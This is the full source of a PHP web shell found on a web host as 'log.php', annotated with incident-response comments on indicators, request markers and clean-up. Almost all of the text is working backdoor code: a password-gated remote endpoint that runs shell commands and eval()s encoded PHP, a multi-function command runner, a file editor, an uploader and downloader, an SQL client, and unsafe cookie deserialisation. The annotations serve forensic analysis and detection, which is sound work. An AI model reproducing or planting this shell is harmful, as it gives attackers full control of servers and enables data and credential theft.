File: /home/dermova/www/india/log.php
<?php
// Analyst note: hard-coded credential for this web shell. The value is an unsalted MD5 digest
// (the author's comment gives the default plaintext), so the literal below is a stable string
// to search for in other files on the host and in Cookie headers (see CommandShell::authenticate).
define("USER_PASS", "1a1dc91c907325c69271ddf0c944bc72"); // Password ( md5 ) Default : pass
// Cosmetic only: selects which palette Css::colors() returns.
define("THEME", "dark"); // Shell theme ( dark / light )
/**
 * Returns the first three characters of PHP_OS, upper-cased.
 * In this file it is only used by the "info" branch of CommandShell::remote_access().
 */
function get_os() {
return strtoupper(substr(PHP_OS, 0, 3));
}
/**
 * Returns the PHP process's current working directory with a trailing separator.
 * Used as the default browse location and as the target of the "Home" link.
 */
function get_root_directory() {
return getcwd() . DIRECTORY_SEPARATOR;
}
/**
 * Returns the "file" query parameter when it names something that exists on disk, else null.
 * The value is used verbatim: nothing here confines it to a base directory.
 */
function get_current_file() {
return (isset($_GET['file']) && file_exists($_GET['file'])) ? $_GET['file']:null;
}
/**
 * Builds the shell's own URL for Location redirects.
 * The scheme is always "http://" and the host part comes from the client-supplied Host header.
 */
function get_current_url() {
return "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"];
}
/**
 * Resolves the directory the file browser, editor and uploader operate on.
 * Order: fall back to the working directory when the user_path cookie is missing or is not a
 * directory; otherwise prefer a valid "path" query parameter; otherwise use the cookie value.
 * Both inputs are request-controlled and are only checked with is_dir().
 */
function get_current_path() {
if(!isset($_COOKIE["user_path"]) || !is_dir($_COOKIE['user_path']))
return get_root_directory();
if(isset($_GET['path']) && is_dir($_GET['path']))
return $_GET['path'];
return $_COOKIE["user_path"];
}
/**
 * Front controller of the web shell: authentication, cookie state, and dispatch to the
 * file browser, file editor, uploader, command runner and SQL client.
 *
 * Analyst notes, all taken from the code below:
 *  - Request markers: query parameter "act" with the values fbrowser, feditor, fuploader, cmd,
 *    sql and exit; cookies user_pass, user_path and user_sql; and the "remote" parameter handled
 *    by remote_access().
 *  - $this->operation is assigned without being declared (dynamic property).
 */
class CommandShell {
/**
 * Reads the requested action from the "act" query parameter and refreshes the cookies.
 * Runs on every request, before any password check has happened.
 */
public function __construct() {
$this->operation = isset($_GET["act"]) ? $_GET["act"] : null;
$this->initializeCookies();
}
/**
 * Gate for the interactive UI.
 * When the user_pass cookie does not match, either accept a POSTed password, set the cookie
 * and redirect, or print a bare password form. exit() then ends the request in both cases,
 * so nothing after the top-level authenticate() call runs for an unauthenticated visitor.
 */
public function authenticate() {
if(!$this->is_logged_in()) {
// The "@" hides the undefined-index notice when no password was posted; comparison is loose (==).
if(@md5($_POST["password"]) == USER_PASS) {
// The cookie carries the USER_PASS constant itself, not a per-session token: the value is
// identical for every session and valid for 24 hours, so it can be matched in proxy/WAF logs.
setcookie("user_pass", USER_PASS, time() + (60 * 60 * 24), "/");
header("Location: " . get_current_url());
} else {
?>
<html>
<form method="POST">
<input name="password" type="text" style="border:0px">
</form>
</html>
<?php
}
exit();
}
}
/**
 * Expires the three shell cookies and redirects when the action is "exit".
 * There is no exit() here, so the rest of the request still runs; for act=exit this method is
 * reached twice (top-level call and execute_actions()).
 */
public function sign_out() {
if($this->operation == "exit") {
setcookie("user_pass", null, time() - (60 * 60), "/");
setcookie("user_path", null, time() - (60 * 60), "/");
setcookie("user_sql", null, time() - (60 * 60), "/");
header("Location: " . get_current_url());
}
}
/** True only when the user_pass cookie is present and loosely equals the stored MD5 constant. */
private function is_logged_in() {
if(!isset($_COOKIE["user_pass"]))
return false;
if($_COOKIE["user_pass"] != USER_PASS)
return false;
return true;
}
/**
 * Maintains the user_path and user_sql cookies (24-hour lifetime, path "/").
 *
 * Analyst notes:
 *  - Called from the constructor, i.e. before authenticate(), so it also runs for visitors
 *    who do not know the password.
 *  - The user_sql cookie is passed to unserialize() as received. Deserialising request data is
 *    unsafe in its own right, which is one more reason to remove the file rather than rely on
 *    the password gate.
 *  - Database host, username and password typed into the SQL form are written back into the
 *    user_sql cookie via serialize(), in clear text; treat any credentials seen there as exposed.
 */
private function initializeCookies() {
if(!isset($_COOKIE["user_path"]) || !is_dir($_COOKIE['user_path']))
setcookie("user_path", get_root_directory(), time() + (60 * 60 * 24), "/");
elseif(isset($_GET['path']) && is_dir($_GET['path']))
setcookie("user_path", $_GET['path'], time() + (60 * 60 * 24), "/");
if(!isset($_COOKIE["user_sql"])) {
// First visit: the cookie is seeded with the field names as placeholder values.
$databaseCookie = array("host", "username", "password", "database", "dbms");
} else {
// NOTE(review): unserialize() on a client-supplied cookie, reached without authentication.
$values = unserialize($_COOKIE["user_sql"]);
$databaseCookie = array();
// Each slot takes the non-empty POST field if present, otherwise the previous cookie value.
$databaseCookie[] = (isset($_POST['host']) && @$_POST['host'] != "") ? $_POST['host'] : $values[0];
$databaseCookie[] = (isset($_POST['username']) && @$_POST['username'] != "") ? $_POST['username'] : $values[1];
$databaseCookie[] = (isset($_POST['password']) && @$_POST['password'] != "") ? $_POST['password'] : $values[2];
$databaseCookie[] = ((isset($_POST['database']) && @$_POST['database'] != "") ? $_POST['database'] : (isset($_GET['database']) ? $_GET['database'] : $values[3]));
$databaseCookie[] = (isset($_POST['dbms']) && @$_POST['dbms'] != "") ? $_POST['dbms'] : $values[4];
}
setcookie("user_sql", serialize($databaseCookie), time() + (60 * 60 * 24), "/");
}
/**
 * Streams the file named in the POSTed "path" field to the client when the "download" button
 * was used and the cookie check passes. FileTransfer::download() ends the request.
 */
public function download_file() {
if(isset($_POST["download"]) && $this->is_logged_in())
FileTransfer::download($_POST['path']);
}
/**
 * Prints a host fingerprint banner: uname string, server software, computer name, node name,
 * the account that owns the script (get_current_user), and the server address.
 */
public function display_info() {
?>
<table>
<tr><th>OS: <?php echo @php_uname(); ?></th></tr>
</table>
<table>
<tr><th>Server: <?php echo getenv('SERVER_SOFTWARE'); ?></th></tr>
</table>
<table>
<tr>
<th>Computer: <?php echo getenv('COMPUTERNAME'); ?></th>
<th>Domain: <?php echo @php_uname('n'); ?></th>
<th>User: <?php echo @get_current_user(); ?></th>
<th>IP: <?php echo (getenv('LOCAL_ADDR') != null) ? getenv('LOCAL_ADDR') : getenv('SERVER_ADDR'); ?></th>
</tr>
</table>
<?php
}
/**
 * Dispatches on the "act" value to the matching tool. Called from the page body, so it is only
 * reached after the top-level authenticate() call has let the request through.
 */
public function execute_actions() {
if($this->operation == "fbrowser") {
$fileBrowser = new FileBrowser(get_current_path());
$fileBrowser->render();
} elseif($this->operation == "feditor") {
$fileEditor = new FileEditor((get_current_file() ? get_current_file() : get_current_path()));
$fileEditor->execute();
$fileEditor->render();
} elseif($this->operation == "fuploader") {
FileTransfer::upload(get_current_path());
} elseif($this->operation == "cmd") {
Cmd::render();
} elseif($this->operation == "sql") {
$sqlHandler = new Database();
$sqlHandler->execute_query();
$sqlHandler->render();
} elseif($this->operation == "exit") {
$this->sign_out();
}
}
/**
 * Headless entry point, separate from the cookie-based UI.
 *
 * Analyst notes:
 *  - The top-level code calls this before authenticate(); it performs its own check by hashing
 *    the "password" request value on every call, so no cookie is involved.
 *  - Log/WAF markers: a "remote" parameter together with "password" and one of "cmd", "php"
 *    or "info". request() URL-decodes GET values and base64-decodes POST values, so POST bodies
 *    will not contain the payload in clear text.
 *  - The "cmd" branch hands the value to Cmd::execute(); the "php" branch passes it to eval();
 *    the "info" branch prints OS prefix, script owner, host name and server address.
 *  - request() is declared inside the method body, so it only exists once this method has run.
 */
public function remote_access() {
function request($req) {
return isset($_GET[$req]) ? urldecode($_GET[$req]) : base64_decode($_POST[$req]);
}
if(isset($_REQUEST["remote"]) && @md5($_REQUEST["password"]) == USER_PASS) {
if(isset($_REQUEST["cmd"]))
Cmd::execute(request("cmd"));
elseif(isset($_REQUEST["php"]))
// NOTE(review): eval() of request-supplied code.
eval(request("php"));
elseif(isset($_REQUEST["info"]))
echo get_os() . ":" . @get_current_user() . "/" . @gethostname() . ":" . @getenv('SERVER_ADDR');
exit();
}
}
}
/**
 * Directory listing tool behind act=fbrowser.
 * Lists the entries of one directory with size, owner, permissions and timestamps, and links
 * each entry back into the shell (directories to act=fbrowser, files to act=feditor).
 * $this->path is assigned without being declared (dynamic property).
 */
class FileBrowser {
/** Stores the directory to list; callers pass the value of get_current_path(). */
public function __construct($path) {
$this->path = $path;
}
/**
 * Emits the listing table. current_directory() and list_drives() echo their output themselves
 * and return nothing, so the surrounding "echo" only triggers them.
 */
public function render() {
?>
<table class="file-browser">
<tr style="<?php echo Css::style("tr"); ?>">
<th>Current Directory: <?php echo $this->current_directory(); ?></th>
<th class="menu"><a href='?act=fbrowser&path=<?php echo get_root_directory(); ?>'>Home</a></th>
<th>Drives: <?php echo $this->list_drives(); ?></th>
<th></th>
<th></th>
</tr>
<tr style="<?php echo Css::style("tr"); ?>">
<th>Name</th><th>Size</th><th>Permissions</th><th>Created</th><th>Modified</th>
</tr>
<?php echo $this->list_files_and_dirs(); ?>
</table>
<?php
}
/**
 * Builds the table rows: directories first, then files.
 * The link target is URL-encoded, but the displayed name and the path in the error row are
 * placed into the HTML without escaping.
 */
private function list_files_and_dirs() {
$directoryRow = "<tr><td><a href='?act=fbrowser&path=%s'>%s</a></td><td>%s</td><td>%s / %s</td><td>%s</td><td>%s</td></tr>";
$fileRow = "<tr><td><a href='?act=feditor&file=%s'>%s</a></td><td>%s</td><td>%s / %s</td><td>%s</td><td>%s</td></tr>";
$items = $this->scan_files_and_dirs();
if($items === false)
return "<tr><th>Can't access: $this->path</th></tr>";
$itemList = "";
foreach($items[0] as $directory)
$itemList .= sprintf($directoryRow, urlencode($directory[1] . DIRECTORY_SEPARATOR), $directory[0] . DIRECTORY_SEPARATOR, $directory[2], $directory[3], $directory[4], $directory[5], $directory[6]);
foreach($items[1] as $file)
$itemList .= sprintf($fileRow, urlencode($file[1]), $file[0], $file[2], $file[3], $file[4], $file[5], $file[6]);
return $itemList;
}
/**
 * Scans $this->path and returns array($directories, $files), or false when scandir() fails.
 * Each entry is a 7-element array: name, full path, size (or "Dir"), owner:group, permissions,
 * stat index 10 timestamp, stat index 9 timestamp.
 * The full path is built by plain concatenation, so $this->path is expected to end with a
 * directory separator.
 */
public function scan_files_and_dirs() {
$directories = array();
$files = array();
if(($scan_result = @scandir($this->path)) === false)
return false;
foreach($scan_result as $item) {
if($item != '.' && $item != '..') {
$fullPath = $this->path . $item;
if(is_dir($fullPath))
$directories[] = array(
$item, $fullPath, "Dir",
$this->get_owner_group($fullPath), $this->get_permissions($fullPath),
$this->get_creation_modification_date($fullPath), $this->get_creation_modification_date($fullPath, 9)
);
if(is_file($fullPath))
$files[] = array(
$item, $fullPath, $this->get_file_size($fullPath),
$this->get_owner_group($fullPath), $this->get_permissions($fullPath),
$this->get_creation_modification_date($fullPath), $this->get_creation_modification_date($fullPath, 9)
);
}
}
return array($directories, $files);
}
/**
 * Echoes one link per path component so each ancestor directory can be opened.
 * The last element of the split is skipped (loop bound is count - 1). Returns nothing.
 */
private function current_directory() {
$path = "";
$parts = explode(DIRECTORY_SEPARATOR, $this->path);
for($i = 0; $i < count($parts) - 1; $i++) {
$path .= $parts[$i] . DIRECTORY_SEPARATOR;
echo "<a href='?act=fbrowser&path=" . $path . "'>" . $parts[$i] . DIRECTORY_SEPARATOR . "</a>";
}
}
/**
 * Probes drive letters A: to Z: and echoes a link for each readable root, or plain text for
 * roots that exist but are not readable. Returns nothing.
 */
private function list_drives() {
foreach(range("A", "Z") as $drive) {
if(@is_readable($drive . ":" . DIRECTORY_SEPARATOR))
echo "<a href='?act=fbrowser&path=$drive:\\'>$drive:\\ </a>";
elseif(@is_dir($drive . ":" . DIRECTORY_SEPARATOR))
echo "$drive:\\ ";
}
}
/** Formats stat index 7 (size in bytes) as whole MB above 1024*1024, whole KB above 1024, else B. */
private function get_file_size($path) {
$stat = stat($path);
if($stat[7] > (1024 * 1024))
return (int)($stat[7] / (1024 * 1024)) . " MB";
elseif($stat[7] > 1024)
return (int)($stat[7] / 1024) . " KB";
return $stat[7] . " B";
}
/** Returns the last four octal digits of fileperms(), e.g. the mode bits. */
private function get_permissions($path) {
return substr(sprintf("%o", fileperms($path)), -4);
}
/** Returns "uid:gid" from stat indexes 4 and 5 (numeric ids, not names). */
private function get_owner_group($path) {
$stat = stat($path);
return $stat[4] . ":" . $stat[5];
}
/**
 * Formats one stat() timestamp as d/m/Y H:i.
 * Index 10 (the default) is ctime and index 9 is mtime. The listing labels index 10 "Created";
 * on Unix-like systems ctime is the inode change time, so do not read it as a creation date.
 */
private function get_creation_modification_date($path, $d = 10) {
$stat = stat($path);
return date("d/m/Y H:i", $stat[$d]);
}
}
/**
 * File manipulation tool behind act=feditor: read, overwrite, delete (recursively), rename and
 * mkdir on a request-supplied path. The submit button names (read, write, remove, rename, mkdir)
 * select the operation. Errors from the filesystem calls are suppressed with "@" and reported
 * only as a short status string.
 * path, content and notification are assigned without being declared (dynamic properties).
 */
class FileEditor {
/** A POSTed "path" field overrides the path passed in by the dispatcher. */
public function __construct($path) {
$this->path = isset($_POST['path']) ? $_POST['path'] : $path;
$this->content = "";
$this->notification = "";
}
/** Runs at most one operation per request, chosen by which submit button is present in POST. */
public function execute() {
if(isset($_POST["read"]))
$this->read_file();
elseif(isset($_POST["write"]))
$this->write_file($_POST['content']);
elseif(isset($_POST["remove"]))
$this->notification = $this->remove_file($this->path) ? "Deleted." : "Failed.";
elseif(isset($_POST["rename"]))
// Rename target comes from the query string (file, else path/cookie), source from the form.
$this->rename_file((get_current_file() == null) ? get_current_path() : get_current_file());
elseif(isset($_POST["mkdir"]))
$this->create_directory();
}
/**
 * Prints the editor form. Path, notification and content are echoed as stored; only content
 * that read_file() classified as HTML has been passed through htmlspecialchars().
 * The "download" button is handled earlier by CommandShell::download_file().
 */
public function render() {
?>
<form method="POST">
<input name="path" type="text" size="60" value="<?php echo $this->path; ?>">
<input name="read" type="submit" value="read >>">
<input name="write" type="submit" value="write >>">
<input name="remove" type="submit" value="remove >>">
<input name="rename" type="submit" value="rename >>">
<input name="mkdir" type="submit" value="mkdir >>">
<input name="download" type="submit" value="download >>">
<b><?php echo $this->notification; ?></b>
<pre class="sep"><textarea name="content"><?php echo $this->content; ?></textarea></pre>
</form>
<?php
}
/** Loads the file into $this->content, escaping it only when is_html() matches. */
private function read_file() {
if(($data = @file_get_contents($this->path)) !== false)
$this->content = $this->is_html($data) ? htmlspecialchars($data) : $data;
else
$this->notification = "Can't access file.";
}
/** Overwrites $this->path with the POSTed content and records "Saved." or "Failed.". */
private function write_file($data) {
$this->notification = (@file_put_contents($this->path, $data) !== false) ? "Saved." : "Failed.";
}
/**
 * Deletes a file, or a directory tree depth-first. Returns the result of the final
 * unlink()/rmdir(); failures on individual children are not reported separately.
 */
private function remove_file($path) {
if(!is_file($path) && !is_dir($path))
return false;
if(is_file($path))
return @unlink($path);
if(($dir_content = @scandir($path)) === false)
return false;
foreach($dir_content as $item)
if($item != "." && $item != "..")
$this->remove_file($path . DIRECTORY_SEPARATOR . $item);
return @rmdir($path);
}
/** Renames $this->path to $new_path and records "Renamed." or "Failed.". */
private function rename_file($new_path) {
$this->notification = (@rename($this->path, $new_path) !== false) ? "Renamed." : "Failed.";
}
/** Creates $this->path as a directory and records "Created." or "Failed.". */
private function create_directory() {
$this->notification = (@mkdir($this->path) !== false) ? "Created." : "Failed.";
}
/**
 * Heuristic used to decide whether file content is escaped before display: true when the data
 * contains an html or body opening tag, or a form or table element, case-insensitively.
 */
private function is_html($data) {
if(preg_match('/<html/im', $data) || preg_match('/<body/im', $data))
return true;
if(preg_match('/<form(.*?)form>/im', $data) || preg_match('/<table(.*?)table>/im', $data))
return true;
return false;
}
}
/**
 * Upload and download helpers. Together they let an operator place new files on the host and
 * pull existing ones off it, so files created or read around the shell's access times belong
 * in the incident scope.
 */
class FileTransfer {
/**
 * Prints the upload form and, when the "upload" button was used, moves the uploaded file to
 * the POSTed "path" concatenated with the client file's base name. No type, size or
 * destination restriction is applied. Log marker: multipart POST to act=fuploader.
 */
public static function upload($path) {
?>
<form method="POST" enctype="multipart/form-data">
<input name="path" type="text" size="60" value="<?php echo $path; ?>">
<input name="file" type="file">
<input name="upload" type="submit" value=" >>">
</form>
<?php
if(isset($_POST["upload"])) {
$destination = $_POST["path"] . basename($_FILES["file"]["name"]);
if(move_uploaded_file($_FILES["file"]["tmp_name"], $destination))
echo "<b>File uploaded.</b>";
else
echo "<b>Failed.</b>";
}
}
/**
 * Sends $file as an attachment (octet-stream) and ends the request.
 * Errors are suppressed, so an unreadable path yields an empty download rather than a message.
 */
public static function download($file) {
header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\"");
header("Content-Length: \"" . @filesize($file) . "\"");
header("Content-Type: application/octet-stream;");
@readfile($file);
exit();
}
}
/**
 * SQL client behind act=sql. Connects through PDO with operator-supplied host, credentials and
 * driver name, runs an arbitrary statement, and renders SELECT/SHOW results as an HTML table.
 *
 * Analyst note: connection details travel in POST fields and in the user_sql cookie, so
 * database credentials used through this page should be rotated during clean-up.
 * host, username, password, database, dbms, query and output are dynamic properties.
 */
class Database {
private $show_dbs = "SHOW DATABASES;";
private $show_tbls = "SHOW TABLES;";
private $mssql_dbs = "SELECT name FROM master.dbo.sysdatabases";
private $mssql_tbls = "SELECT * FROM INFORMATION_SCHEMA.TABLES;";
/**
 * Collects connection settings and the statement to run.
 * Settings: POST field if present, otherwise the matching slot of the user_sql cookie.
 * Statement: "SHOW TABLES;" when a database is given in the query string, a SELECT on the
 * "table" query parameter when that is given, else the default database listing; a submitted
 * form replaces it with the POSTed query (or a driver-specific database listing when empty).
 */
public function __construct() {
// NOTE(review): unserialize() on a client-supplied cookie.
$cookies = isset($_COOKIE["user_sql"]) ? unserialize($_COOKIE["user_sql"]) : array("host", "username", "password", "database", "dbms");
$get_db = isset($_GET['database']) ? urldecode($_GET['database']) : null;
$get_table = isset($_GET['table']) ? urldecode($_GET['table']) : null;
$this->host = isset($_POST['host']) ? $_POST['host'] : $cookies[0];
$this->username = isset($_POST['username']) ? $_POST['username'] : $cookies[1];
$this->password = isset($_POST['password']) ? $_POST['password'] : $cookies[2];
$this->database = (isset($get_db) ? $get_db : (isset($_POST['database']) ? $_POST['database'] : $cookies[3]));
$this->dbms = isset($_POST['dbms']) ? $_POST['dbms'] : $cookies[4];
// The table name from the query string is interpolated directly into the statement text.
$this->query = (isset($get_db) ? "SHOW TABLES;" : (isset($get_table) ? "SELECT * FROM $get_table;" : $this->show_dbs));
if(isset($_POST["submit"]))
$this->query = ((@$_POST['query'] != "") ? $_POST['query'] : ($this->dbms == "mssql" ? $this->mssql_dbs : $this->show_dbs));
$this->output = "";
}
/**
 * Prints the connection/query form followed by the stored output.
 * All field values, including the database password, are echoed back into the page unescaped
 * and in a visible text input.
 */
public function render() {
?>
<form method="POST">
<input name="host" type="text" size="12" value="<?php echo $this->host; ?>" onclick="clearValue('host')">
<input name="username" type="text" size="12" value="<?php echo $this->username; ?>" onclick="clearValue('username')">
<input name="password" type="text" size="12" value="<?php echo $this->password; ?>" onclick="clearValue('password')">
<input name="database" type="text" size="12" value="<?php echo $this->database; ?>" onclick="clearValue('database')">
<input name="dbms" type="text" size="12" value="<?php echo $this->dbms; ?>" onclick="clearValue('dbms')">
<input name="query" type="text" size="60" value="<?php echo $this->query; ?>" onclick="clearValue('query')">
<input name="submit" type="submit" value=" >>">
</form>
<div class="sep">
<?php echo $this->output; ?>
</div>
<?php
}
/**
 * Connects and runs $this->query when the form was submitted or a database/table link was
 * followed. Statements starting with SELECT or SHOW have their rows rendered; anything else
 * reports "Query executed.". PDO exceptions are caught and their message is appended to the
 * output.
 */
public function execute_query() {
if(isset($_POST['submit']) || isset($_GET['database']) || isset($_GET['table'])) {
// $dsn is assigned but not used; the same string is rebuilt inline in the PDO constructor call.
$dsn = "$this->dbms:host=$this->host; dbname=$this->database";
try {
@$conn = new PDO("$this->dbms:host=$this->host; dbname=$this->database", $this->username, $this->password);
@$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// prepare() is called on the full statement text with no bound parameters.
@$query = $conn->prepare($this->query);
try {
@$query->execute();
if(strtoupper(substr($this->query, 0, 6)) == "SELECT" || strtoupper(substr($this->query, 0, 4)) == "SHOW")
$this->read_results($query);
else
$this->output = "<b>Query executed.</b>";
} catch(PDOException $e) {
$this->output = "<b>Query failed.</b>" . $e->getMessage();
}
} catch(PDOException $e) {
$this->output = "<b>Connection failed: </b>" . $e->getMessage();
}
$conn = null;
}
}
/**
 * Renders the result set into $this->output as an HTML table, with a header row taken from
 * the first row's column names. Values in a column named DATABASE, or whose name starts with
 * TABLE, become links back into act=sql; only the remaining cells go through htmlspecialchars().
 */
private function read_results($query) {
$this->output = "<table class='sql'>";
// $result is not used afterwards.
$result = @$query->setFetchMode(PDO::FETCH_ASSOC);
foreach($query->fetchAll() as $index => $row) {
if($index == 0) {
$this->output .= "<tr>";
foreach($row as $name => $value)
$this->output .= "<th>$name</th>";
$this->output .= "</tr>";
}
$this->output .= "<tr>";
foreach($row as $name => $value) {
if(strtoupper($name) == "DATABASE")
$this->output .= "<td><a href='?act=sql&database=" . urlencode($value) . "'>" . $value . "</a></td>";
elseif(strtoupper(substr($name, 0, 5)) == "TABLE")
$this->output .= "<td><a href='?act=sql&table=" . urlencode($value) . "'>" . $value . "</a></td>";
else
$this->output .= "<td>" . htmlspecialchars($value) . "</td>";
}
$this->output .= "</tr>";
}
$this->output .= "</table>";
}
}
/**
 * Operating-system command runner behind act=cmd and the "cmd" branch of
 * CommandShell::remote_access().
 *
 * Analyst notes:
 *  - Commands run as the account of the PHP process, so process-creation telemetry showing the
 *    web server or PHP worker spawning a shell is the host-side indicator to look for.
 *  - execute() and output() fall through six different PHP functions; hardening through
 *    disable_functions therefore has to cover every one of them (system, passthru, shell_exec,
 *    exec, popen, proc_open) to be effective against this file.
 */
class Cmd {
/**
 * Prints the command form and, when the "run" button was used, executes the POSTed "cmd"
 * value with " 2>&1" appended so that stderr appears in the page as well.
 */
public static function render() {
?>
<form method="POST">
<input name="cmd" type="text" size="80" value="cmd_" onclick="clearValue('cmd', 'any')">
<input name="run" type="submit" value=" >>">
</form>
<?php
if(isset($_POST["run"])) {
$command = @$_POST["cmd"] . " 2>&1";
echo "<pre>";
Cmd::execute($command);
echo "</pre>";
}
}
/**
 * Runs $command with the first callable of system() and passthru(), which write straight to
 * the response; otherwise echoes whatever output() returns.
 */
public static function execute($command) {
if(is_callable("system"))
system($command);
elseif(is_callable("passthru"))
passthru($command);
else
echo Cmd::output($command);
}
/**
 * Runs $command with the first callable of shell_exec, exec, popen and proc_open and returns
 * the captured output as a string, or "Failed." when none is callable.
 * In the proc_open branch only the stdout pipe is read and closed; the return value of
 * proc_open() is not checked.
 */
public static function output($command) {
$output = "";
if(is_callable("shell_exec")) {
$output = shell_exec($command);
} elseif(is_callable("exec")) {
exec($command, $outputLines);
foreach($outputLines as $line)
$output .= $line . PHP_EOL;
} elseif(is_callable("popen")) {
if(($process = popen($command, 'r')) !== false) {
while(!feof($process))
$output .= fread($process, 1024);
pclose($process);
}
} elseif(is_callable("proc_open")) {
$descriptors = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$proc = proc_open($command, $descriptors, $pipes);
while(!feof($pipes[1]))
$output .= fread($pipes[1], 1024);
fclose($pipes[1]);
proc_close($proc);
} else {
$output = "Failed.";
}
return $output;
}
}
/**
 * Presentation helper: colour palette and inline style strings for the page. No request data
 * is read here.
 */
class Css {
/** Returns the palette (color, background, link, visited, hover) for the configured THEME. */
public static function colors() {
if(THEME == "dark")
$colors = array(
"color" => "#ddefff", "background" => "#181818",
"link" => "#ddefff", "visited" => "#83c5ff", "hover" => "#202020"
);
else
$colors = array(
"color" => "#181818", "background" => "#f0f8ff",
"link" => "#015fb2", "visited" => "#00437e", "hover" => "#ddefff"
);
return $colors;
}
/**
 * Returns a CSS declaration string for body/table/tr/th/td, input or hover.
 * Any other $part, including the default "color", returns the palette array instead of a string.
 */
public static function style($part = "color") {
$colors = Css::colors();
if($part == "body" || $part == "table" || $part == "tr" || $part == "th" || $part == "td") {
return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['background']);
} elseif($part == "input") {
if(THEME == "dark")
return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['background'], $colors['color'], $colors['visited']);
else
return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['hover'], "#242424", $colors['link']);
} elseif($part == "hover") {
return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['hover']);
} else {
return $colors;
}
}
}
?>
<?php
/*
 * Request handling order (analyst note):
 *  1. The constructor calls initializeCookies(), which unserializes the user_sql cookie and
 *     sets cookies before any password check.
 *  2. remote_access() serves the headless "remote" requests with its own password check and
 *     ends the request when it matches.
 *  3. authenticate() ends the request for anyone without the user_pass cookie, so everything
 *     below this point, including the page body, is only reached by a logged-in operator.
 *  4. sign_out() and download_file() act on act=exit and the "download" button.
 */
$shell = new CommandShell(); ?>
<?php $shell->remote_access(); ?>
<?php $shell->authenticate(); ?>
<?php $shell->sign_out(); ?>
<?php $shell->download_file(); ?>
<?php $colors = Css::colors(); ?>
<html>
<head>
<title>Command Shell</title>
<style>
body { <?php echo Css::style("body"); ?> text-align:left; padding:2px; font-size:12px; }
table { <?php echo Css::style("table"); ?> border-collapse:collapse; width:100%; padding:2px; font-size:12px; }
th { font-size:13px; text-align:left; padding:2px; }
td { font-size:12px; text-align:left; padding:2px; }
table.file-browser tr { <?php echo Css::style("tr"); ?> }
table.file-browser tr:hover { <?php echo Css::style("hover"); ?> }
.sql { border:1px solid <?php echo $colors['color']; ?>; <?php echo Css::style("table"); ?> width:100%; padding:2px; font-size:12px;}
.sql th { <?php echo Css::style("th"); ?> border:1px solid <?php echo $colors['color']; ?>;}
.sql td { font-size:12px; text-align:left; padding:2px; }
.sql tr { <?php echo Css::style("tr"); ?> }
.sql tr:hover { <?php echo Css::style("hover"); ?> }
input { <?php echo Css::style("input"); ?> font-size:12px; padding:2px; }
textarea { width:100%; height:100%; }
div { padding:2px; }
.sep { padding:0px; }
a:link { color:<?php echo $colors['link']; ?>; }
a:visited { color:<?php echo $colors['visited']; ?>; }
.menu { text-align:left; padding:2px; font-size:13px; }
.menu a { color:<?php echo $colors['color']; ?>; text-decoration:none; }
</style>
<script>
// UI helper for the forms: empties the first element with the given name when it still holds
// its placeholder (its own field name), when it equals the supplied value, or always when the
// second argument is "any". It only touches the DOM; nothing is sent to the server.
function clearValue(name, value="") {
if(
document.getElementsByName(name)[0].value == name
|| document.getElementsByName(name)[0].value == value
|| value == "any"
)
document.getElementsByName(name)[0].value = "";
}
</script>
</head>
<body>
<div>
<?php $shell->display_info(); ?>
</div>
<div>
<hr>
<table class="menu">
<tr>
<th><a href="?act=fbrowser">File Browser</a></th>
<th><a href="?act=feditor">File Editor</a></th>
<th><a href="?act=fuploader">File Uploader</a></th>
<th><a href="?act=cmd">Run Command</a></th>
<th><a href="?act=sql">SQL Queries</a></th>
<th><a href="?act=exit">Exit</a></th>
</tr>
</table>
<hr>
</div>
<div>
<?php $shell->execute_actions(); ?>
</div>
</body>
</html>